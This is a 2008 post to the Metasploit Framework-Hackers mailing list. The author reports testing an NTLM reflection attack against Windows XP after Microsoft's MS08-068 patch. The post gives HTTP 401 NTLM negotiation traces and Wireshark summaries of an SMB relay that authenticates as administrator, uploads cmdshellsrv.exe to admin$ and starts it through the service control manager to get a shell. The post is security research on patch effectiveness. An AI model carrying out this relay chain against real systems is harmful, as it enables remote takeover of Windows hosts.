-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ArcSighter Elite wrote: > ArcSighter Elite wrote: >> H D Moore wrote: >>> On Monday 22 December 2008, ArcSighter Elite wrote: >>>> I came this morning with something. The MS08-67 patch when challenge >>>> keys couldn't be replayed, affects also the other variants of the >>>> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP >>>> and SMTP versions? >>> Supposedly it affects any component that initializes the security >>> negotiation the "right" way, but only during a direct reflection attack. >>> You can still relay to a third-party host regardless of protocol. >>> -HD > > > >>> ------------------------------------------------------------------------ >>> _______________________________________________ >>> Framework-Hackers mailing list >>> Framework-Hackers@spool.metasploit.com >>> http://spool.metasploit.com/mailman/listinfo/framework-hackers >> Well, this is how we go. > >> Before MS08-067: > >> Windows XP SP2 Spanish: >> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009 >> doesn't block (find-socket). >> I totally owned SMB-SMB attack, UNC share. > >> After MS08-067: >> I owned too! But this time I got a prompt asking for username and >> password; I mean, It doesn't automatically authenticate. >> The SMB-SMB attack doesn't spawn my shell. > > >> Tell me what you think to proceed to XP SP3; although I think I will get >> the same results. > > > Sorry about the typo, Is MS08-068 what I've applied not MS08-067-netapi. > It's the right patch, and the results are above.
Well, it surprisingly seems to work also in XP-Sp3 before and after the patch too, the interesting prompt about username/password authentication was my bad; i don' get prompt neither XP-SP3 nor XP-SP2; after I rebooted SP2. Here is what I've done (some hack in Python) 1. Force browser to authenticate HTTP 401 + WWW-Authenticate: NTLM Ex.: (Here *.*.*.1 is server, *.*.*.2 client) GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) Host: *.*.*.1 Connection: Keep-Alive HTTP/1.1 401 Unauthorized Content-Length: 0 Content-Type: text/html Server: Microsoft-IIS/6.0 WWW-Authenticate: NTLM Connection: keep-alive GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) Host: *.*.*.1 Connection: Keep-Alive Authorization: NTLM TlR********AAB4IIogAAAAAAAAAAAAAAAAAAAAAFASgKAAAADw== //-- Avoid null sesions HTTP/1.1 401 Access Denied Server: Microsoft-IIS/6.0 WWW-Authenticate: NTLM TlR********ABgAGADgAAAAHsgAA+vnrqY91YSEAAAAAAAAAACwALAA+AAAABQEoCgAAAA9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAAAAAA== Content-Length: 0 Content-Type: text/html GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) Host: *.*.*.1 Connection: Keep-Alive Authorization: NTLM TlR********AAAAGAAYAHwAAAAYABgAlAAAABQAFABIAAAAGgAaAFwAAAAGAAYAdgAAAAAAAACsAAAABYIAAgUBKAoAAAAPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg== HTTP/1.1 200 OK Content-Length: 92 Connection: close 2. The basic replay attack (wireshark summaries only): //- Negotiating 513 10.025748 *.*.*.1 *.*.*.2 SMB Negotiate Protocol Request 516 10.026712 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE /-- Authenticating 520 10.029566 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_AUTH, User: WS2\Administrador /-- Accessing IPC$ 523 10.034183 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\IPC$ /--Accesing admin$ 531 10.040157 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\admin$ /--Uploading exefile 533 10.041749 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path: \cmdshellsrv.exe /--Accessing service control manager. 561 11.066248 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, FID: 0x4000, Path: \svcctl /-- well I got tired. The rest you already know: binding, OpenSCManager, OpenService, StartService => owning! So please give another point of view, because what I've realized here is that MS didn't fix this properly! Sincerely. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT+vBH+KgkfcIQ8cRAqaAAJ4uisGYE7yPxPebhpCRZvUiwfDyDQCgu8QM hMpB9+OjOr+z+IV5IZOT8EE= =HlGL -----END PGP SIGNATURE----- _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers